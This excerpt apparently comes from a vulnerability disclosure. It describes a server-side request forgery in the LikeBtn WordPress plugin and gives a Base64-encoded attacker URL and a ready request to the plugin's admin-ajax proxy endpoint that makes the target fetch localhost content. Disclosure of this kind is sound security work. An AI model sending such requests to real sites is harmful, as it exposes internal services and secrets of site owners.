Let's say that an attacker owns the website attackerwebsite.bla and wants to attack targetwebsite.bla which uses the LikeBtn WP plugin. The attacker would then do the following:

1. Create the subdomain
2. Make the subdomain redirect to localhost
3. Base64 encode the URL to the new subdomain ( -> aHR0cDovL2xpa2VidG4uY29tLmF0dGFja2Vyd2Vic2l0ZS5ibGE=)
4. Make a request to https://targetwebsite.bla/wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q= aHR0cDovL2xpa2VidG4uY29tLmF0dGFja2Vyd2Vic2l0ZS5ibGE=
5. The attacker then receives all the juicy secret info stored on localhost